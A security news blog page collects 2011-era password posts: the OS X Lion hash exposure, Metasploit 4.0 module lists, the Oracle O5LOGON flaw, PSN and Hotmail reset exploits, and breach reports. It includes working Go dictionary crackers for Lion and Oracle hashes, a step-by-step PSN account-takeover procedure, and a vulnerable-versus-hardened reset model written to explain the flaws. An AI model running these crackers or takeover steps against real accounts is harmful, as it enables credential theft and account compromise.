Showing posts sorted by relevance for query password.

Vulnerability in OS X 10.7 Lion Allows Passwords to Be Changed Without Authorization

A researcher at the Defense in Depth blog has discovered a flaw in Apple's recently released operating system, OS X 10.7 (Lion), which allows a user's password to be changed without knowledge of the current password. The flaw appears to be related to Apple's move to a local directory service whose permissions are set insecurely. An attacker with access to a logged-in Mac (locally, over VNC/RDC, SSH, etc.) can change the currently logged-in user's password without knowing the existing password, which would normally be required:

testmac:~ TestUser$ dscl localhost -passwd /Search/Users/TestUser
New Password:


Historically (in Snow Leopard) you would have needed to enter your existing password first to verify that you in fact are the account holder:

testmac:~ TestUser$ passwd
Changing password for TestUser.
Old Password: -OldPass-
New Password: -NewPass-
Retype New Password: -NewPass-


Not only can a logged-in user change their password without knowledge of the existing password, but any user can read any other user's password hash and attempt to brute-force it. Defense in Depth showed how to parse the hash out of the openly readable directory information and recover both the hash and the salt that was used when the password was hashed. Note that a salt only defeats precomputed (rainbow-table) attacks; once the salt is known, each guess costs one hash computation, so weak passwords remain crackable. This is another good reason to be sure you have secured your Mac properly until Apple makes a fix available. Taking the following steps will help ensure you are protected:

  • Use a secure password to prevent brute force attacks against your account using stolen hashes.
  • Enable the screensaver and set it to prompt you for your password.
  • Disable automatic logon.
  • Never leave your Mac logged in and unattended. Use a "Hot Corner" or the Keychain lock to lock your screen.
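
To make the brute-force step concrete, here is an added example in Go, written for this page rather than taken from the Defense in Depth post or from Apple. It assumes the Lion SALTED-SHA512 layout as stored in the ShadowHashData attribute: a 4-byte salt followed by SHA-512 over salt || password, carried as a 136-character hex string. The target hash, its salt and the wordlist are constructed inline; in the real attack the hex value is what you read out of the directory for the other user.

```go
package main

import (
	"bytes"
	"crypto/sha512"
	"encoding/hex"
	"errors"
	"fmt"
)

// saltLen is the size of the salt that prefixes a Lion SALTED-SHA512 value.
const saltLen = 4

// LionHash holds the two parts of a SALTED-SHA512 value: the 4-byte salt and
// SHA-512(salt || password), as found in a user's ShadowHashData.
type LionHash struct {
	Salt   []byte
	Digest []byte
}

// ParseLionHash splits the 136-character hex string into salt and digest.
func ParseLionHash(hexHash string) (LionHash, error) {
	raw, err := hex.DecodeString(hexHash)
	if err != nil {
		return LionHash{}, err
	}
	if len(raw) != saltLen+sha512.Size {
		return LionHash{}, errors.New("expected 4-byte salt followed by 64-byte SHA-512 digest")
	}
	return LionHash{Salt: raw[:saltLen], Digest: raw[saltLen:]}, nil
}

// lionDigest computes SHA-512 over salt || password, the Lion construction.
func lionDigest(password string, salt []byte) []byte {
	h := sha512.New()
	h.Write(salt)
	h.Write([]byte(password))
	return h.Sum(nil)
}

// MakeLionHash produces the hex form as it would appear in ShadowHashData.
// It is used here only to build a constructed target; an attacker reads the
// value from the directory instead of computing it.
func MakeLionHash(password string, salt []byte) string {
	return hex.EncodeToString(salt) + hex.EncodeToString(lionDigest(password, salt))
}

// CrackLionHash runs a dictionary attack. The salt is public, so each guess
// costs exactly one SHA-512; a match returns the recovered password.
func CrackLionHash(hexHash string, wordlist []string) (string, bool) {
	parsed, err := ParseLionHash(hexHash)
	if err != nil {
		return "", false
	}
	for _, guess := range wordlist {
		if bytes.Equal(lionDigest(guess, parsed.Salt), parsed.Digest) {
			return guess, true
		}
	}
	return "", false
}

func main() {
	// Constructed target: a user whose password is "Summer2011" with a fixed salt.
	target := MakeLionHash("Summer2011", []byte{0xde, 0xad, 0xbe, 0xef})
	fmt.Println("SALTED-SHA512:", target)
	wordlist := []string{"password", "letmein", "Summer2011", "qwerty"} // constructed
	if pw, ok := CrackLionHash(target, wordlist); ok {
		fmt.Println("recovered:", pw)
	} else {
		fmt.Println("not in wordlist")
	}
}
```

The salt only rules out precomputed tables; with the salt in hand the attacker pays one SHA-512 per guess, which is why the first bullet above (a strong password) still matters once the hashes are exposed.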

For more information, see the researcher's original blog post at Defense in Depth.



-News Source (NS & Defence Blog)


Metasploit Framework v4.0.0 Released

The Metasploit Framework is a penetration testing toolkit, exploit development platform, and research tool. The framework includes hundreds of working remote exploits for a variety of platforms. Payloads, encoders, and nop slide generators can be mixed and matched with exploit modules to solve almost any exploit-related task.

New Exploit Modules:

VSFTPD v2.3.4 Backdoor Command Execution
Java RMI Server Insecure Default Configuration Java Code Execution
HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow
HP OpenView Network Node Manager Toolbar.exe CGI Cookie Handling Buffer Overflow
Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
Black Ice Cover Page ActiveX Control Arbitrary File Download
Microsoft Office Visio VISIODWG.DLL DXF File Handling Vulnerability
MicroP 0.1.1.1600 (MPPL File) Stack Buffer Overflow
Lotus Notes 8.0.x – 8.5.2 FP2 – Autonomy Keyview
RealWin SCADA Server DATAC Login Buffer Overflow
Siemens FactoryLink vrn.exe Opcode 9 Buffer Overflow
Iconics GENESIS32 Integer overflow version 9.21.201.01
Siemens FactoryLink 8 CSService Logging Path Param Buffer Overflow
Sielco Sistemi Winlog Buffer Overflow
Blue Coat Authentication and Authorization Agent (BCAAA) 5 Buffer Overflow
HP OmniInet.exe Opcode 20 Buffer Overflow
HP OmniInet.exe Opcode 27 Buffer Overflow
Citrix Provisioning Services 5.6 streamprocess.exe Buffer Overflow

New Post-Exploitation Modules:

Winlogon Lockout Credential Keylogger
Windows Gather Microsoft Outlook Saved Password Extraction
Windows Gather Process Memory Grep
Windows Gather Trillian Password Extractor
Windows PCI Hardware Enumeration
Windows Gather FlashFXP Saved Password Extraction
Windows Gather Local and Domain Controller Account Password Hashes
Windows Gather Nimbuzz Instant Messenger Password Extractor
Windows Gather CoreFTP Saved Password Extraction
Internet Download Manager (IDM) Password Extractor
Windows Gather SmartFTP Saved Password Extraction
Windows Gather Bitcoin wallet.dat
Windows Gather Service Info Enumeration
Windows Gather IPSwitch iMail User Data Enumeration

New Auxiliary Modules:

John the Ripper Password Cracker Fast Mode
Microsoft Windows DNSAPI.dll LLMNR Buffer Underrun DoS
Kaillera 0.86 Server Denial of Service
2Wire Cross-Site Request Forgery Password Reset Vulnerability
SIPDroid Extension Grabber
MSSQL Password Hashdump


Notable Features & Closed Bugs:-

Feature #4982 – Support for custom executable with psexec
Feature #4856 – RegLoadKey and RegUnLoadKey functions for the Meterpreter stdapi
Feature #4578 – Update Nmap XML parsers to support Nokogiri parsing
Feature #4417 – Post exploitation module to harvest OpenSSH credentials
Feature #4015 – Increase test coverage for railgun
Bug #4963 – Rework db_* commands for consistency
Bug #4892 – non-windows meterpreters upload into the wrong filename
Bug #4296 – Meterpreter stdapi registry functions create key if one doesn’t exist
Bug #3565 – framework installer fails on RHEL (postgres taking too long to start)

Armitage integrates with Metasploit 4.0 to:-

Take advantage of the new Meterpreter payload stagers
Crack credentials with the click of a button
Run post modules against multiple hosts
Automatically log all post-exploitation activity

Revision Information:

Framework Revision 13462
Several import parsers were rewritten to use Nokogiri for much faster processing of large import files. Adding to Metasploit’s extensive payload support, Windows and Java Meterpreter now both support staging over HTTP and Windows can use HTTPS. In a similar vein, POSIX Meterpreter is seeing some new development again. It still isn’t perfect nor is it nearly as complete as the Windows version, but many features already work. Java applet signing is now done directly in Ruby, removing the need for a JDK for generating self-signed certificates. The Linux installers now ship with ruby headers, making it possible to install native gems in the Metasploit ruby environment.

Another flexibility improvement comes in the form of a consolidated pcap interface. The pcaprub extension ships with the Linux installers as of this release and support for Windows will come soon. Modules that used Racket for generating raw packets have been converted to Packetfu, which provides a smoother API for modules to capture and inject packets.

Metasploit Framework v4.0.0 is available for download from the Metasploit project site, which also has more information about MSF.


Ekoparty Conference: Stealth Password Cracking Vulnerability Found in Oracle Database


A researcher has unveiled a serious vulnerability in the authentication protocol used by some Oracle databases, a flaw that could enable a remote attacker to brute-force a token provided by the server prior to authentication and determine a user's password. The attacker could then log on as an authenticated user and take unauthorized actions on the database. The vulnerability exists in Oracle Database 11g Releases 1 and 2 and is caused by a problem with the way the authentication protocol protects session keys when users try to log in. The first step in the authentication process, when a client contacts the database server, is for the server to send a session key back to the client, along with a salt. The vulnerability enables an attacker to link a specific session key with a specific password hash, so the session key itself becomes an offline-crackable token. Esteban Martinez Fayó, the researcher who discovered the bug, has also released a tool that can crack some simple passwords in about five hours on a normal PC. Fayó is a security specialist at AppSec Inc; he demonstrated his findings at the Ekoparty conference, which is currently taking place in Buenos Aires.
According to Esteban Martinez Fayó, "This Session Key is a random value that the server generates and sends as the initial step in the authentication process, before the authentication has been completed. This is the reason why this attack can be done remotely without the need of authentication and also, as the attacker can close the connection once the Session Key has been sent, there is no failed login attempt recorded in the server because the authentication is never completed." He also said: "Once the attacker has a Session Key and a Salt (which is also sent by the server along with the session key), the attacker can perform a brute force attack on the session key by trying millions of passwords per second until the correct one is found. This is very similar to a SHA-1 password hash cracking. Rainbow tables can't be used because there is a Salt used for password hash generation, but advanced hardware can be used, like GPUs combined with advanced techniques like Dictionary hybrid attacks, which can make the cracking process much more efficient."
"Basically, I discovered that not all failed login attempts were recorded by the database. Looking closer at the issue, I located the problem in the way that one of the components of the logon protocol, the Session Key, was protected. I noticed that, in a certain way, the Session Key was leaking information about the password hash," he added.
Although Oracle closed the hole with the 11.2.0.3 patch set, which introduced the new version 12 of the protocol in mid-2011, Fayó said that there has been no fix for versions 11.1 and 11.2 of the database because the update was never included in any of Oracle's regular "critical patch updates". The researcher explained that unless administrators activate the new protocol manually (on 11.2.0.3 this is governed by the SQLNET.ALLOWED_LOGON_VERSION family of settings in sqlnet.ora, which must be raised to 12 so that the server refuses the older protocol), the database will continue to use the vulnerable 11.2 protocol. Because the vulnerability is in a widely deployed product and is easy to exploit, Fayó said he considers it quite dangerous. "The Oracle stealth password cracking vulnerability is a critical one. There are many components to affirm this: It is easy to exploit, it doesn't leave any trace in the database server and it resides in an essential component of the logon protocol," he said.
"It is very simple to exploit.  The attacker just needs to send a few network packets or use a standard Oracle client to get a Session Key and Salt for a particular user.  Then, an attack similar to that of cracking SHA-1 password hash can be performed. I developed a proof-of-concept tool that shows that it is possible to crack an 8 characters long lower case alphabetic password in approximately 5 hours using standard CPUs."
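
The exchange Fayó describes, reduced to the parts that matter for cracking, as an added example in Go; this is not Fayó's proof-of-concept tool nor anything from the Threatpost article. It assumes the publicly analysed shape of the O5LOGON version 11 step: AUTH_VFR_DATA is a 10-byte salt, AUTH_SESSKEY is 48 bytes of AES-192-CBC ciphertext under a zero IV, the key is SHA-1(password || salt) extended with four zero bytes, and the plaintext is a 32-byte session key followed by 16 bytes of PKCS#7 padding (0x08). Under that model a guessed password is verified by decrypting only the last ciphertext block and checking for the padding, which is what lets the attack run at hash-cracking speed with no further contact with the server. The password, salt and candidate list are constructed, and the server side is a simulation standing in for the real listener.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha1"
	"fmt"
)

// ServerHello is what the server sends before authentication completes:
// the encrypted session key (AUTH_SESSKEY) and the salt (AUTH_VFR_DATA).
type ServerHello struct {
	AuthSessKey []byte // 48 bytes
	Salt        []byte // 10 bytes
}

// pkcs7Pad is what the last plaintext block must equal when the key is right.
var pkcs7Pad = bytes.Repeat([]byte{0x08}, aes.BlockSize)

// o5logonKey derives the AES-192 key (assumed model of the v11 protocol):
// SHA-1(password || salt) extended with four zero bytes to 24 bytes.
func o5logonKey(password string, salt []byte) []byte {
	h := sha1.New()
	h.Write([]byte(password))
	h.Write(salt)
	key := make([]byte, 0, 24)
	key = append(key, h.Sum(nil)...)
	return append(key, 0, 0, 0, 0)
}

// serverHello simulates the server: a fresh 32-byte session key is padded to
// 48 bytes and encrypted with AES-192-CBC (zero IV) under the password-derived key.
func serverHello(password string, salt []byte) (ServerHello, error) {
	sessionKey := make([]byte, 32)
	if _, err := rand.Read(sessionKey); err != nil {
		return ServerHello{}, err
	}
	plain := append(sessionKey, pkcs7Pad...)
	block, err := aes.NewCipher(o5logonKey(password, salt))
	if err != nil {
		return ServerHello{}, err
	}
	ct := make([]byte, len(plain))
	cipher.NewCBCEncrypter(block, make([]byte, aes.BlockSize)).CryptBlocks(ct, plain)
	return ServerHello{AuthSessKey: ct, Salt: salt}, nil
}

// CrackSessionKey is the attacker side. Only the last block needs decrypting:
// in CBC, P3 = D_k(C3) XOR C2, and P3 is all 0x08 exactly when k came from
// the right password (a false match has probability 2^-128).
func CrackSessionKey(h ServerHello, candidates []string) (string, bool) {
	if len(h.AuthSessKey) != 48 {
		return "", false
	}
	c2, c3 := h.AuthSessKey[16:32], h.AuthSessKey[32:48]
	last := make([]byte, aes.BlockSize)
	for _, pw := range candidates {
		block, err := aes.NewCipher(o5logonKey(pw, h.Salt))
		if err != nil {
			continue
		}
		block.Decrypt(last, c3)
		for i := range last {
			last[i] ^= c2[i]
		}
		if bytes.Equal(last, pkcs7Pad) {
			return pw, true
		}
	}
	return "", false
}

func main() {
	salt := []byte("0123456789")                 // constructed 10-byte AUTH_VFR_DATA
	hello, err := serverHello("welcome1", salt) // constructed target password
	if err != nil {
		panic(err)
	}
	// The attacker closes the connection here; no failed login is ever recorded.
	pw, ok := CrackSessionKey(hello, []string{"oracle", "manager", "welcome1", "tiger"})
	fmt.Println("recovered:", pw, ok)
}
```

The attacker side touches only AuthSessKey and Salt, which is the whole point of the bug: the server hands over an offline-verifiable function of the password before authentication completes, so the guessing happens on the attacker's hardware and never shows up as a failed login.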


-Source (Threat Post)







MysqlPasswordAuditor- Mysql Password Recovery & Auditing Tool

We have good news for those who tend to forget their passwords and so put themselves, or even their systems and databases, at risk. Anyone who has lost or forgotten a MySQL database password need not worry, because MysqlPasswordAuditor can help recover it easily. It can also help audit MySQL database server setups in a corporate environment by discovering weak password configurations. This makes it a must-have tool for IT administrators and penetration testers.

Brief About MysqlPasswordAuditor:- 
MysqlPasswordAuditor is very easy to use and relies on a simple dictionary-based password recovery method, so it only finds passwords that appear in the list you give it. By default it includes a small password list file; larger dictionaries are available from the OpenWall collection. You can also use tools such as Crunch or Cupp to generate custom password lists and then use them with MysqlPasswordAuditor.

Features:-
  • Free and Simple software to Recover/Audit Mysql Password.
  • Very useful for IT administrators & Penetration Testers
  • Dictionary based Password Recovery method
  • Detailed statistics such as tested passwords, elapsed time, progress bar is displayed during Audit operation.
  • Simple, easy to use GUI interface
  • Integrated Installer for local Installation & Uninstallation.

MysqlPasswordAuditor is available as a free download (link in the original post).




Microsoft Introduced Picture Passwords For Windows 8


The experience of signing in to your PC with touch has traditionally been a cumbersome one. In a world with increasingly strict password requirements (numbers, symbols and capitalization), it can take upwards of 30 seconds to enter a long, complex password on a touch keyboard. To address this, Microsoft is introducing a new technology that lets you log in to your Windows 8 PC with a picture password. Likely designed for touchscreens, it presents users with a familiar picture of their choice and asks them to make a series of finger gestures on the screen to set up password protection. Microsoft recommends that users pick at least three gestures and can choose between a circle, a tap and a line drawn between two points. When a user logs in to a Windows 8 machine using Picture Password, they simply have to replicate the correct placement, order and direction of all gestures.

Microsoft limited the set to three gesture types after research showed that login time was cut from 17 seconds using free-form gestures to 4 seconds using preset gestures. Users do not have to be 100 percent accurate with the placement of the gestures: the image is broken up into a grid, and each login attempt is scored by an algorithm on how closely the gestures match the stored ones. If the score is 90 percent or above, the user gains access to the system. Microsoft also outlined how security is increased with the Picture Password method. For instance, if a user creates a six-character text password with at least one uppercase letter and one number, there would be 7 billion combinations available. However, if a user creates a picture password with six gestures using only taps, that number increases to 1.3 trillion combinations. Even further, reducing the number of gestures to five and including at least one circle and one line gesture within the group increases the number of combinations to approximately 70 trillion. The Windows engineering team has just started building the Picture Password functionality and hopes to include it in the final version of Windows 8, likely to be released during 2012.
You can find more information about this article on the Windows 8 Developer Blog 



PSN Network Password Recovery Exploited




Patrick Seybold, Sr. Director of Corporate Communications and Social Media, has released a statement on the PlayStation.Blog regarding this situation. Seybold clarifies that it was not a "hack" but a URL exploit that Sony has now fixed.
Here’s the official statement:
We temporarily took down the PSN and Qriocity password reset page. Contrary to some reports, there was no hack involved. In the process of resetting of passwords there was a URL exploit that we have subsequently fixed.
Consumers who haven’t reset their passwords for PSN are still encouraged to do so directly on their PS3. Otherwise, they can continue to do so via the website as soon as we bring that site back up.
[Original Article] The Password Recovery program that has been implemented by Sony since the PSN’s return has been moving along nicely. With such a huge influx of people requesting their information through their secure email connection, as opposed to on a PS3, Sony stated that the process would take a little longer than originally estimated. It may be even longer now. While the hack that shut down the PSN was quite “sophisticated,” a small little exploit seems to have been discovered to change the passwords again.
But if you’re worried that your PS3 will go silent once again, fret not. This password exploit seems to only be affecting various web-based Sony services. An official community moderator on the EU PlayStation forums have indicated that several sites are offline, including PlayStation.com, the forums, the Blog, Qriocity.com, and others. The login functions for these services are currently unavailable. For the time being all PlayStation Network activity is still online for PS3 and PSP users. So you don’t have to worry about that. But what DID happen?
If you wanted to reset your PSN password from your computer, you were sent an email with a unique URL to match your account. The entire process is actually fairly primitive. Note that it won’t work right now, as login services are offline.
The procedure is as follows:
1) Navigate to : https://store.playstation.com/accounts/reset/resetPassword.action?token (this is normally, via email, https://store.playstation.com/accounts/reset/resetPassword.action?token=YYYYYYYYYYYYYYYYYYYYYYYY with the y’s being a unique token) – do not enter the code at this point.
2) Open a new tab in Firefox, go to fr.playstation.com (other regional sites will most likely work too), and click Login (Connexion)
3) Click Recover password
4) Enter the email and date of birth of the target account
5) Click continue, then on the confirmation page, click “Reset using E-mail”
6) Switch back to the original tab, and enter the code, then click continue
7) You will now be asked to enter a new password for the target account
Fortunately, if your account WAS compromised, you should have received an email saying something along the lines of "Thank you for changing your password; if you were unaware of this change please contact Sony." While this method is as effective as it is simple, it would take a lot of time to work through any large number of accounts by hand. It sounds like Sony found out about this and shut off its only access point fairly quickly. Only one more question left:
When will it just end?


Webmail gets hacked, corporate passwords exposed


This week, one of our C-level executives suffered a personal security incident that spilled over to the workplace. Here's what happened.
The executive's Yahoo email password was compromised, which she learned after hearing from friends who told her that they had received messages from her requesting money to deal with a crisis. You've probably heard similar stories, but whoever hacked the executive's email was a bit more clever than the average cybercrook. One friend was suspicious of the request and asked for verification of the executive's identity. Most email hijackers would probably give up and move on to another victim at that point, but this hacker had sifted through the executive's emails and learned enough about her family, vacations and health issues to trick the friend and dupe her into wiring the money.
Naturally, the executive had used her Yahoo Mail account for a variety of activities, including setting up accounts with her bank, her brokerage, an airline and various shopping sites. The Yahoo account had received emails containing clear-text passwords when she had forgotten them. Worse, she often used the same password for multiple accounts.
I advised her to abandon the email account and to contact all of her friends and let them know that they should disregard any mail from that address. But that action, or simply changing the password, probably wouldn't be enough to stem the damage. Most identity thieves will download all the email from a compromised account, as well as data such as calendars and contact lists, to a local computer. This is quite simple, since many webmail clients allow customers to use more feature-rich email clients such as Microsoft Outlook to download email. So even if the account were shut down or the password changed, the hacker would probably still have all of its contents.
Because the compromised content could not be safeguarded, I also told her to file a police report; contact all banks, credit card companies, brokerages and other organizations with which she had done business online; file a fraud alert with the major credit agencies; sign up for a credit-monitoring service; and obtain a new email address and update all of her accounts with that address. I also warned her to refrain from using any PCs, including her home PC, until we could verify their integrity, since we still didn't know how her password had been compromised.

Dangerous Habit

In the course of our conversation, I learned that this incident had implications for the company. You see, we have increased our use of software as a service to the point that we now use more SaaS offerings than on-premises applications. Some might see this as an achievement. I see it as a security nightmare.
As I've explained in past articles, most SaaS vendors have focused more on functionality and accessibility than on security. This incident is a perfect example of how that approach can lead to problems. The executive had a habit of forgetting her passwords for SaaS applications, and she gave me a list of seven SaaS apps that had sent password reset notices to her hacked email account -- in clear, unencrypted text!
Fortunately, none of the data used with these particular apps was extremely sensitive. But she had used her domain password for all of the applications. This meant we had to change her domain password and then log in to all the other applications -- about 15 altogether -- that were not synchronized with Active Directory or configured for single sign-on.
Needless to say, this was not a good day for this executive. But on a positive note, I did get a sponsor for my security awareness and training program.




Microsoft Fixed The Password Reset Vulnerability in Hotmail


The recent 0-day vulnerability in Hotmail's password reset feature, which allowed attackers to reset other users' passwords remotely, has been fixed. Attackers were able to use a Firefox add-on called Tamper Data to intercept the outgoing HTTP request that follows a password reset request and modify its data, locking out the account holder and gaining access to their inbox.
Microsoft's security team said in a tweet on Friday that it had "addressed a reset function incident to help protect Hotmail customers", and that no further action was needed on the customer's part. "The vulnerability allows an attacker to reset the Hotmail/MSN password with attacker chosen values. Remote attackers can bypass the password recovery service to setup a new password and bypass in place protections (token based) … Successful exploitation results in unauthorised MSN or Hotmail account access," the researchers wrote on Thursday. Although public disclosure only came on Thursday, reports of the flaw's exploitation had already been circulating. The WhiteC0de blog noted a week ago that the exploit had "spread like wildfire across the hacking community", with victims losing money and, in some cases, valuable usernames. The WhiteC0de report also noted rumours of a separate "critical vulnerability" in Hotmail that is also being exploited, but stressed that there was no evidence yet of these rumours' veracity.
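
The PSN reset procedure described earlier on this page and the Hotmail request-tampering case above share a root cause: the server let something other than the reset token (session state in one case, attacker-editable request fields in the other) decide which account receives the new password. The Go code below is an added example, a hypothetical model written for this page rather than Sony's or Microsoft's implementation, whose internals neither article discloses. Its vulnerable flow binds the target account to the browser session set by the most recent recovery request, so a token issued for the attacker's own account resets whichever account the session last pointed at; the hardened flow beside it derives the account only from the token's own record, stores tokens hashed, makes them single-use and time-limited, and accepts no client-supplied account identifier at all. Accounts, addresses and passwords are constructed.

```go
package main

import (
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"time"
)

type account struct{ password string }

// Session is per-browser server-side state. The vulnerable flow records here
// which account the most recent "recover password" request was for.
type Session struct{ pendingReset string }

type resetRecord struct {
	email   string
	expires time.Time
	used    bool
}

// ResetService keeps tokens keyed by SHA-256(token) so a database leak does
// not hand out live reset tokens; now is injectable for testing expiry.
type ResetService struct {
	accounts map[string]*account
	tokens   map[string]*resetRecord
	now      func() time.Time
}

func NewResetService() *ResetService {
	return &ResetService{accounts: map[string]*account{}, tokens: map[string]*resetRecord{}, now: time.Now}
}

func (s *ResetService) AddAccount(email, password string) { s.accounts[email] = &account{password: password} }

func (s *ResetService) Password(email string) string {
	if a, ok := s.accounts[email]; ok {
		return a.password
	}
	return ""
}

func hashToken(tok string) string {
	sum := sha256.Sum256([]byte(tok))
	return hex.EncodeToString(sum[:])
}

// issueToken creates a random, time-limited token bound to email. In a real
// system it is delivered only to that mailbox.
func (s *ResetService) issueToken(email string) (string, error) {
	if _, ok := s.accounts[email]; !ok {
		return "", errors.New("no such account")
	}
	b := make([]byte, 32)
	if _, err := rand.Read(b); err != nil {
		return "", err
	}
	tok := hex.EncodeToString(b)
	s.tokens[hashToken(tok)] = &resetRecord{email: email, expires: s.now().Add(15 * time.Minute)}
	return tok, nil
}

// VulnerableRequest models the flawed design: besides issuing a token it
// remembers the target account in the session.
func (s *ResetService) VulnerableRequest(sess *Session, email string) (string, error) {
	sess.pendingReset = email
	return s.issueToken(email)
}

// VulnerableComplete verifies that the token exists but takes the account from
// session state, so any valid token resets whatever the session points at.
func (s *ResetService) VulnerableComplete(sess *Session, token, newPassword string) error {
	if _, ok := s.tokens[hashToken(token)]; !ok {
		return errors.New("invalid token")
	}
	acct, ok := s.accounts[sess.pendingReset]
	if !ok {
		return errors.New("no reset pending")
	}
	acct.password = newPassword // BUG: account chosen by session, not by token
	return nil
}

// RequestReset is the hardened request: nothing about the target is kept in the session.
func (s *ResetService) RequestReset(email string) (string, error) { return s.issueToken(email) }

// HardenedComplete derives the account from the token's own record, refuses
// reuse and expiry, and ignores anything else the client might send.
func (s *ResetService) HardenedComplete(token, newPassword string) error {
	rec, ok := s.tokens[hashToken(token)]
	if !ok || rec.used || s.now().After(rec.expires) {
		return errors.New("invalid, used or expired token")
	}
	rec.used = true
	s.accounts[rec.email].password = newPassword
	return nil
}

func main() {
	svc := NewResetService()
	svc.AddAccount("victim@example.com", "victim-secret") // constructed accounts
	svc.AddAccount("attacker@example.com", "attacker-pw")
	sess := &Session{}
	tok, _ := svc.VulnerableRequest(sess, "attacker@example.com") // tab 1: token mailed to attacker
	svc.VulnerableRequest(sess, "victim@example.com")            // tab 2: repoints the session
	fmt.Println("vulnerable:", svc.VulnerableComplete(sess, tok, "owned"), svc.Password("victim@example.com"))
	svc2 := NewResetService()
	svc2.AddAccount("victim@example.com", "victim-secret")
	svc2.AddAccount("attacker@example.com", "attacker-pw")
	tok2, _ := svc2.RequestReset("attacker@example.com")
	fmt.Println("hardened:", svc2.HardenedComplete(tok2, "x"), svc2.Password("victim@example.com"))
}
```

The hardened handler has exactly two inputs, the token and the new password, which is what makes request tampering of the Tamper Data kind pointless: there is no account field to edit, and the token is worthless for any account other than the one it was mailed to.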

-Source (ZDnet)  




Hash Code Cracker V 1.2 Released ~ Password Cracking Tool from BreakTheSecurity


BreakTheSecurity released the Hash Code Cracker Version 1.2.
Description:-
This password cracker is developed for penetration testers and ethical hackers. Please use this software only for legal purposes (testing password strength).

Features:-
This software cracks MD5, SHA1 and NTLM (Windows password) hashes. Being Java-based, it runs on all platforms (Windows XP/7, Linux, ...).

V1.2 Change log:-
Online cracking support added. Note that online cracking submits the hash to third-party lookup services, so do not use it for hashes you are not permitted to disclose.

Minimum Requirements:-
Java Runtime Environment: JRE 1.6 or later must be installed (available from oracle.com).

How to Run the Application:-
Download the .zip file and extract it.
Open a terminal or command prompt.
Navigate to the extracted HashCodeCracker folder.
Run "java -jar HashCodeCracker.jar".
The application will now start.

Hash Code Cracker V 1.2 is available for download from BreakTheSecurity (link in the original post).

HashCodeCracker v1.2 Video Tutorials Are also Available:-
How to Run Hash Code Cracker Jar using Command Prompt~Password Cracking

How to Crack the Password using Online Cracker Hash Code Cracker v1.2

How to start Hash Code Cracker Jar with double Click~Password Cracking




Thousands of Sources Exposed by WikiLeaks in Written-Down Password SNAFU



The cone of silence over WikiLeaks' thousands of sources - many of whose lives are at risk if identified - has been shattered, all thanks to the most mundane, all-too-human security screwup imaginable.
To wit: WikiLeaks founder Julian Assange wrote down the password on a piece of paper, and then forgot to change it later. The security breach has thrown open the doors to WikiLeaks' entire archive of 251,000 secret U.S. diplomatic cables.
To the horror of the media partners it has worked with in the past to carefully redact the documents - The Guardian, The New York Times, El Pais, Der Spiegel and Le Monde - WikiLeaks has published its entire archive, unredacted, putting in danger several thousands of people whom the U.S. has tagged as being at risk if exposed. The documents also cite more than 150 whistle blowers.
"We deplore the decision of WikiLeaks to publish the unredacted state department cables, which may put sources at risk," the organizations said in a joint statement. 
"Our previous dealings with WikiLeaks were on the clear basis that we would only publish cables which had been subjected to a thorough joint editing and clearance process. We will continue to defend our previous collaborative publishing endeavour. We cannot defend the needless publication of the complete data – indeed, we are united in condemning it."

The media partners made it clear that this time, with this move, Assange got no help from them. "The decision to publish by Julian Assange was his, and his alone," they said in the statement. Der Spiegel has chronicled the archive’s publishing, tracing it back to a meeting between Assange and David Leigh of The Guardian.
According to the account, as the British journalist recounts in his book "Inside Julian Assange's War on Secrecy", Leigh and Assange at one point sat down to discuss how Assange would provide Leigh with a file including all of the diplomatic dispatches received by WikiLeaks.
According to Der Spiegel, Assange placed the file on a server and wrote part of the password on a slip of paper. To make it work, one had to complete the list of characters with a certain word.

Can you remember it? Assange asked. Of course, Leigh said.

"At the time, Daniel Domscheit-Berg, who later founded the site OpenLeaks, was the German spokesman for WikiLeaks. When he and others undertook repairs on the WikiLeaks server, he took a dataset off the server which contained all manner of files and information that had been provided to WikiLeaks. What he apparently didn't know at the time, however, was that the dataset included the complete collection of diplomatic dispatches hidden in a difficult-to-find sub-folder," according to Der Spiegel.
With the dataset in the hands of Domscheit-Berg, Leigh went on to describe his meeting with Assange in his book. In the book, however, he included not only the portion of the password on the slip of paper, but also the part he had been asked to commit to memory.
What followed included feuding between Domscheit-Berg and Assange, attempts to prove that Assange wasn’t trustworthy, and the eventual disclosure that not only was the entire dataset circulating, but that the password could be found in Leigh's book.
At this point, finger-pointing is rampant. WikiLeaks' Twitter feed blames The Guardian. The Guardian is protesting its innocence, putting out a statement claiming that it had been told the password was only temporary.
The U.S. Embassy in London and the U.S. State Department were notified of the possible publication on August 25 to enable officials to warn the named informants. Hopefully, this has given them enough time to remove themselves from harm.
Whether that is possible for all the sources who’ve been put in harm's way is an open question.
But one thing is certain: The platforms to which whistleblowers have hitherto brought their leaks are compromised. They are as riddled with security holes, as flailing with common human weaknesses, as the most ridiculed home user running an unsecured wireless network and the most inept office worker writing down his password on a Post-It note.
Let us hope that this carelessness, this breathtaking lapse in security hygiene, leads to no loss of life.

-News Source (Wikileaks & Naked Security)



Security Breach Australia's Largest Telecom "TELSTRA" Forces 35K Users To Change Password


Telstra, Australia's largest telecommunications company, has been forced to reset the passwords of 35,000 users of its gaming websites GameArena and Games Shop after a hacking attack. A statement issued by Telstra on Thursday morning warned that information such as user names, email addresses and passwords may have been stolen.
"We have reset the passwords of GameArena and Games Shop customers, after the sites were victims of a hacking attack," the statement said. "While your password for access to the site has been changed, and the new password has been emailed to you, we encourage you to change it at any other site where you might have used the same password." No financial or credit card details were kept on the sites. Telstra said the sites are operated by a third party, so other Telstra customers should not be affected. "We will contact affected customers, with their new password, as soon as possible," Telstra added.
In 2011 we saw similar attacks when cyber criminals targeted MapleStory players and stole the personal details of 13 million of them; Square Enix servers were also hacked, leading to more than 1.8 million accounts being compromised.






Windows 8 Adds Built In Synchronized Password Manager


Microsoft hopes to simplify the task of managing multiple passwords with the next major release of its operating system. According to the Windows 8 blog, a new feature will allow users to put an unlimited number of individual passwords behind one master password and have them synchronize across all other Windows 8 machines they use.
Since the Windows Live ID is the only password you will need to know, you can set complex and unique passwords for multiple websites, so if one site gets hacked and your credentials are stolen from its servers, your entire digital life will not be at risk. Windows 8 will automatically enter your login information when you visit a saved website. This is similar to what services such as 1Password and LastPass currently offer.
